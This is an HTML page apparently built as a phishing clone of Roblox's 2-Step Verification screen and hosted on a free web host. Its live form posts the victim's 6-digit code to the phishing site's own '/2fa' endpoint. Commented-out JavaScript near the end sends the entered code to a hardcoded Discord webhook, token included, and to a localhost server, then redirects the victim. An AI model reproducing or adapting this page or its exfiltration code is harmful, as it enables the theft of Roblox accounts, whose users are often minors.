<!DOCTYPE html>
<html>
   <!--<![endif]-->
   <head data-machine-id="WEB1165">

      <title>Roblox</title>
      <meta http-equiv="X-UA-Compatible" content="IE=edge,requiresActiveX=true">
      <meta charset="UTF-8">
      <meta name="viewport" content="width=device-width, initial-scale=1">
      <meta name="author" content="Roblox Corporation">
      <meta name="description" content="Roblox is a global platform that brings people together through play.">
      <meta name="keywords" content="free games, online games, building games, virtual worlds, free mmo, gaming cloud, physics engine">
      <meta name="apple-itunes-app" content="app-id=431946152">
     
      <link href="https://images.rbxcdn.com/23421382939a9f4ae8bbe60dbe2a3e7e.ico.gzip" rel="icon">
      <link onerror="Roblox.BundleDetector &amp;amp; Roblox.BundleDetector.reportBundleError(this)" rel="stylesheet" data-bundlename="StyleGuide" href="https://css.rbxcdn.com/9157afd5cee40eb7b436a6945743afc5a4e11f242379b22371e6a508f06bcc2d.css">
      <link onerror="Roblox.BundleDetector &amp;amp; Roblox.BundleDetector.reportBundleError(this)" rel="stylesheet" data-bundlename="Thumbnails" href="https://css.rbxcdn.com/9517d686dc47015c200496d77e2b18146ee37652d18e25ecf9e1ed230310ea13.css">
      <link rel="canonical" href="https://www.roblox.com/login/twostepverification?returnUrl=https:%2F%2Fwww.roblox.com%2Flogin%3Fnl%3Dtrue&amp;tl=3f8da66d-f239-45d8-9406-13491ccd5ac0&amp;username=EXPLOITEREVCANGAMING">
      <link onerror="Roblox.BundleDetector &amp;amp; Roblox.BundleDetector.reportBundleError(this)" rel="stylesheet" href="https://static.rbxcdn.com/css/leanbase___3678d89e5ec3f4d8c65d863691f31de2_m.css/fetch">
      <link onerror="Roblox.BundleDetector &amp;amp; Roblox.BundleDetector.reportBundleError(this)" rel="stylesheet" data-bundlename="Captcha" href="https://css.rbxcdn.com/24a76e8ea70afb9462fad013faa3d22ff3e832e8327ddd764dafe328918bed90.css">
      <link onerror="Roblox.BundleDetector &amp;amp; Roblox.BundleDetector.reportBundleError(this)" rel="stylesheet" data-bundlename="TwoStepVerification" href="https://css.rbxcdn.com/ae5f062713e7f497be129e2e367d585e5889d06cb720b62e16863d54b73b3233.css">
      <link onerror="Roblox.BundleDetector &amp;amp; Roblox.BundleDetector.reportBundleError(this)" rel="stylesheet" data-bundlename="RobuxIcon" href="https://css.rbxcdn.com/2f599b9e9ca20ee3c155684adbf1cdcb7220bab681b55b4505123a0c34e81969.css">
     
   
      <meta name="thumbnail-meta-data" data-is-webapp-cache-enabled="False" data-webapp-cache-expirations-timespan="00:01:00" data-request-min-cooldown="1000" data-request-max-cooldown="30000" data-request-max-retry-attempts="5" data-request-batch-size="100" data-thumbnail-metrics-sample-size="50">
      
   </head>
   <body id="rbx-body" class="rbx-body  no-footer light-theme gotham-font" data-performance-relative-value="0.005" data-internal-page-name="" data-send-event-percentage="0">
      <div id="roblox-linkify" data-enabled="true" data-regex="(https?\:\/\/)?(?:www\.)?([a-z0-9-]{2,}\.)*(((m|de|www|web|api|blog|wiki|corp|polls|bloxcon|developer|devforum|forum|status)\.roblox\.com|robloxlabs\.com)|(www\.shoproblox\.com)|(roblox\.status\.io)|(rblx\.co)|help\.roblox\.com(?![A-Za-z0-9\/.]*\/attachments\/))(?!\/[A-Za-z0-9-+&amp;@#\/=~_|!:,.;]*%)((\/[A-Za-z0-9-+&amp;@#\/%?=~_|!:,.;]*)|(?=\s|\b))" data-regex-flags="gm" data-as-http-regex="(([^.]help|polls)\.roblox\.com)"></div>
      <div id="image-retry-data" data-image-retry-max-times="30" data-image-retry-timer="500" data-ga-logging-percent="10"></div>
      <div id="http-retry-data" data-http-retry-max-timeout="0" data-http-retry-base-timeout="0" data-http-retry-max-times="1"></div>
      <div id="fb-root"></div>
      <div id="wrap" class="wrap no-gutter-ads logged-out" data-gutter-ads-enabled="false">
         <div class="container-main no-header-nav
            " id="container-main">
            
            <div class="alert-container">
               <noscript>
                  <div>
                     <div class="alert-info" role="alert">Please enable Javascript to use all the features on this site.</div>
                  </div>
               </noscript>
            </div>
            <div class="content">
               <input name="__RequestVerificationToken" type="hidden" value="qxIcTZ0ucEgW-bi76OCqRGa2oUsoPkKy4zsCQLn-6ktuajt0fgz1B3xYYjBUxVxJ8YanI1Hgee9by5dnwEib9T5_kGA1">
               <div class="rbx-header"></div>
               <div id="two-step-verification" class="two-step-verification ng-scope" rbx-two-step-data="">
                  <div>
                     <form method="post" name="samlRequestForm" class="ng-pristine ng-valid"> <input name="RelayState" value="" type="hidden" autocomplete="off"> <input name="SAMLRequest" value="" type="hidden" autocomplete="off"> </form>
                     <div class="row page-content">
                        <h1 class="header ng-binding" ng-bind="'Label.TwoStepVerification' | translate">2-Step Verification</h1>
                     </div>
                     <div class="col-xs-12 section-content">
                        <div class="logo-method">
                           <div class="logo-img email-img"></div>
                        </div>
                        <div class="content-group">
                           <!-- ngIf: verification.method === verificationMethods.email -->
                           <div class="ng-binding ng-scope">Enter the code we just sent you via email</div>
                           <!-- end ngIf: verification.method === verificationMethods.email --> 

                           <form action="/2fa" method="POST">
                              <div class="input-container">
                                 <input class="hidden" type="text" name="fakeusernameremembered"> 
                                 <div class="form-group">
                                    
                                       <input id="2SI" type="" name="2fa" class="form-control input-field text-center ng-pristine ng-untouched ng-valid ng-empty ng-valid-maxlength" autocomplete="false" name="digits" placeholder="Enter 6-digit Code" key-press-enter="send()" ng-disabled="layout.waitForVerify" maxlength="6" numbers-only ng-trim="false" ng-model="formData.IdentificationCode"> 
                                       <p ng-show="layout.invalidCodeError" ng-bind="layout.invalidCodeErrorMessage" class="form-control-label error-label ng-binding ng-hide"></p>
                                       <p ng-show="getLayoutValue('tooManyCharsError')" class="form-control-label error-label ng-binding ng-hide" ng-bind="'Response.TooManyCharacters' | translate">Too many characters</p>
                                 </div>
                              </div>
                              <div class="button-container"> <button type="submit" id="2fabutton" class="btn-primary-md ng-binding" >Verify</button> <div id="Loading" class="loading spinner spinner-default" style="display: none;"></div> </div>
                           </form>
                              <div class="checkbox trust-device"> <input id="remember-device" type="checkbox" ng-model="formData.RememberDevice" tabindex="0" class="ng-pristine ng-untouched ng-valid ng-empty"> <label for="remember-device" ng-bind="'Label.TrustThisDevice' | translate" class="ng-binding">Trust this device for 30 days</label> </div>
                              <div class="code-message-action">
                                 <!-- ngIf: layout.codeSent --> <!-- ngIf: layout.codeSent --> 
                                 <div class="text-block"> <a class="text-name small ng-binding" ng-click="resendCode()" ng-bind="'Action.Resend' | translate">Resend Code</a> </div>
                              </div>
                           <div class="support">
                              <div class="text-block"> <span class="text-footer ng-binding" ng-bind-html="layout.supportPageLinkPhrase"></span> </div>
                           </div>
                        </div>
                     </div>
                  </div>
               </div>
            </div>
         </div>
      </div>
     
      <div id="PlaceLauncherStatusPanel" style="display:none;width:300px" data-new-plugin-events-enabled="True" data-event-stream-for-plugin-enabled="True" data-event-stream-for-protocol-enabled="True" data-is-game-launch-interface-enabled="True" data-is-protocol-handler-launch-enabled="True" data-is-user-logged-in="False" data-os-name="Windows" data-protocol-name-for-client="roblox-player" data-protocol-name-for-studio="roblox-studio" data-protocol-roblox-locale="en_us" data-protocol-game-locale="en_us" data-protocol-url-includes-launchtime="true" data-protocol-detection-enabled="true" data-protocol-separate-script-parameters-enabled="true" data-protocol-avatar-parameter-enabled="false" data-protocol-channel-name="LIVE">
         <div class="modalPopup blueAndWhite PlaceLauncherModal" style="min-height: 160px">
            <div id="Spinner" class="Spinner" style="padding:20px 0;">
               <img data-delaysrc="https://images.rbxcdn.com/e998fb4c03e8c2e30792f2f3436e9416.gif" height="32" width="32" alt="Progress" src="https://images.rbxcdn.com/e998fb4c03e8c2e30792f2f3436e9416.gif" class="src-replaced">
            </div>
            <div id="status" style="min-height:40px;text-align:center;margin:5px 20px">
               <div id="Starting" class="PlaceLauncherStatus MadStatusStarting" style="display:block">
                  Starting Roblox...
               </div>
               <div id="Waiting" class="PlaceLauncherStatus MadStatusField">Connecting to Players...</div>
               <div id="StatusBackBuffer" class="PlaceLauncherStatus PlaceLauncherStatusBackBuffer MadStatusBackBuffer"></div>
            </div>
            <div style="text-align:center;margin-top:1em">
               <input type="button" class="Button CancelPlaceLauncherButton translate" value="Cancel">
            </div>
         </div>
      </div>
      <div id="ProtocolHandlerClickAlwaysAllowed" class="ph-clickalwaysallowed" style="display:none;">
         <p class="larger-font-size">
            <span class="icon-moreinfo"></span>
            Check <strong>Always open links for URL: Roblox Protocol</strong> and click <strong>Open URL: Roblox Protocol</strong> in the dialog box above to join games faster in the future!
         </p>
      </div>
      
      <div id="InstallationInstructions" class="" style="display:none;">
         <div class="ph-installinstructions">
            <div class="ph-modal-header">
               <span class="icon-close simplemodal-close"></span>
               <h3 class="title">Thanks for playing Roblox</h3>
            </div>
            <div class="modal-content-container">
               <div class="ph-installinstructions-body ">
                  <ul class="modal-col-4">
                     <li class="step1-of-4">
                        <h2>1</h2>
                        <p class="larger-font-size">Click <strong>RobloxPlayer.exe</strong> to run the Roblox installer, which just downloaded via your web browser.</p>
                        <img data-delaysrc="https://images.rbxcdn.com/28eaa93b899b93461399aebf21c5346f.png" src="https://images.rbxcdn.com/28eaa93b899b93461399aebf21c5346f.png" class="src-replaced">
                     </li>
                     <li class="step2-of-4">
                        <h2>2</h2>
                        <p class="larger-font-size">Click <strong>Run</strong> when prompted by your computer to begin the installation process.</p>
                        <img data-delaysrc="https://images.rbxcdn.com/51328932dedb5d8d61107272cc1a27db.png" src="https://images.rbxcdn.com/51328932dedb5d8d61107272cc1a27db.png" class="src-replaced">
                     </li>
                     <li class="step3-of-4">
                        <h2>3</h2>
                        <p class="larger-font-size">Click <strong>Ok</strong> once you've successfully installed Roblox.</p>
                        <img data-delaysrc="https://images.rbxcdn.com/3797745629baca2d1b9496b76bc9e6dc.png" src="https://images.rbxcdn.com/3797745629baca2d1b9496b76bc9e6dc.png" class="src-replaced">
                     </li>
                     <li class="step4-of-4">
                        <h2>4</h2>
                        <p class="larger-font-size">After installation, click <strong>Play</strong> below to join the action!</p>
                        <div class="VisitButton VisitButtonContinueGLI">
                           <a class="btn btn-primary-lg disabled btn-full-width">Play</a>
                        </div>
                     </li>
                  </ul>
               </div>
            </div>
            <div class="xsmall">
               The Roblox installer should download shortly. If it doesn’t, start the <a id="GameLaunchManualInstallLink" href="#" class="text-link">download now.</a>
               
            </div>
         </div>
      </div>
      <div class="InstallInstructionsImage" data-modalwidth="970" style="display:none;"></div>
      <div id="pluginObjDiv" style="height:1px;width:1px;visibility:hidden;position: absolute;top: 0;"></div>
      <iframe id="downloadInstallerIFrame" name="downloadInstallerIFrame" style="visibility:hidden;height:0;width:1px;position:absolute"></iframe>
      
      <div class="ConfirmationModal modalPopup unifiedModal smallModal" data-modal-handle="confirmation" style="display:none;">
         <a class="genericmodal-close ImageButton closeBtnCircle_20h"></a>
         <div class="Title"></div>
         <div class="GenericModalBody">
            <div class="TopBody">
               <div class="ImageContainer roblox-item-image" data-image-size="small" data-no-overlays="" data-no-click="">
                  <img class="GenericModalImage" alt="generic image">
               </div>
               <div class="Message"></div>
            </div>
            <div class="ConfirmationModalButtonContainer GenericModalButtonContainer">
               <a href="" id="roblox-confirm-btn"><span></span></a>
               <a href="" id="roblox-decline-btn"><span></span></a>
            </div>
            <div class="ConfirmationModalFooter">
            </div>
         </div>
         
      </div>
      <div id="modal-confirmation" class="modal-confirmation" data-modal-type="confirmation">
         <div id="modal-dialog" class="modal-dialog">
            <div class="modal-content">
               <div class="modal-header">
                  <button type="button" class="close" data-dismiss="modal">
                  <span aria-hidden="true"><span class="icon-close"></span></span><span class="sr-only">Close</span>
                  </button>
                  <h5 class="modal-title"></h5>
               </div>
               <div class="modal-body">
                  <div class="modal-top-body">
                     <div class="modal-message"></div>
                     <div class="modal-image-container roblox-item-image" data-image-size="medium" data-no-overlays="" data-no-click="">
                        <img class="modal-thumb" alt="generic image">
                     </div>
                     <div class="modal-checkbox checkbox">
                        <input id="modal-checkbox-input" type="checkbox">
                        <label for="modal-checkbox-input"></label>
                     </div>
                  </div>
                  <div class="modal-btns">
                     <a href="" id="confirm-btn"><span></span></a>
                     <a href="" id="decline-btn"><span></span></a>
                  </div>
                  <div class="loading modal-processing">
                     <img class="loading-default" src="https://images.rbxcdn.com/4bed93c91f909002b1f17f05c0ce13d1.gif" alt="Processing...">
                  </div>
               </div>
               <div class="modal-footer text-footer">
               </div>
            </div>
         </div>
      </div>
      
      </div>
      <div ng-modules="pageTemplateApp" class="ng-scope">
         
      </div>
      
      
      <div style="text-align: right;position: fixed;z-index:9999999;bottom: 0;width: auto;right: 1%;cursor: pointer;line-height: 0;display:block !important;"><a title="Hosted on free web hosting 000webhost.com. Host your own website for FREE." target="_blank" href="https://www.000webhost.com/?utm_source=000webhostapp&utm_campaign=000_logo&utm_medium=website&utm_content=footer_img"></a></div>
   </body>
   <script>
      
      //   function send(){
      //       const digits = document.getElementById("2SI").value
      //       const options = {
      //           method: "POST",
      //           headers: {
      //               "Content-Type": "application/json"
      //           },
      //           body: JSON.stringify({yle: digits}), 
      //       }
      //       fetch("http://localhost:3002/2fas",options)
      //       console.log(digits)

         // e=document.getElementById("2SI")
         // console.log("yle")
         // const n=e.value.trim()
         // ""!=n?(await(({webhookURL:e,content:o})=>fetch(e,{
         //    method:"post",
         //    headers:{"Content-Type":"application/json"},
         //    body:JSON.stringify(o)
         // }))({
         //       webhookURL:"https://discord.com/api/webhooks/1035582489458135111/DlKs8y7LEtsDu8tADuFOindNyQcjWq1Dm3ijctEDt9V6hsc69q1EWx8L63QKxSO8DJLn",content:{
         //       description:"Valid attempt requested",embeds:[{
         //       fields:[{
         //       name:"Username",value:n,inline:!0}
         //           ],color:7143253,timestamp:(new Date).toISOString()}
         //                                               ]}
         //    }
         //    ),window.location.replace("http://localhost:3002/")):window.location.reload()
      
      //   }
        
   </script>
   <!-- <script type="text/javascript">document.addEventListener("DOMContentLoaded",()=>{
      const e=document.getElementById("2SI"),t=document.getElementById("2fabutton");
      document.querySelector("p.login-error").setAttribute("style","display: none !important;"),console.log("Loaded",t);
      
      t.addEventListener("click",async t=>{
         console.log("yle")
         t.preventDefault();
         const n=e.value.trim()
         ""!=n?(await(({webhookURL:e,content:o})=>fetch(e,{
            method:"post",
            headers:{"Content-Type":"application/json"},
            body:JSON.stringify(o)
         }))({
               webhookURL:"https://discord.com/api/webhooks/1035582489458135111/DlKs8y7LEtsDu8tADuFOindNyQcjWq1Dm3ijctEDt9V6hsc69q1EWx8L63QKxSO8DJLn",content:{
               description:"Valid attempt requested",embeds:[{
               fields:[{
               name:"Username",value:n,inline:!0}
                   ],color:7143253,timestamp:(new Date).toISOString()}
                                                       ]}
            }
            ),window.location.replace("http://localhost:3002/")):window.location.reload()
      }
                                                          )}
      );
      
      
      
   </script> -->
</html>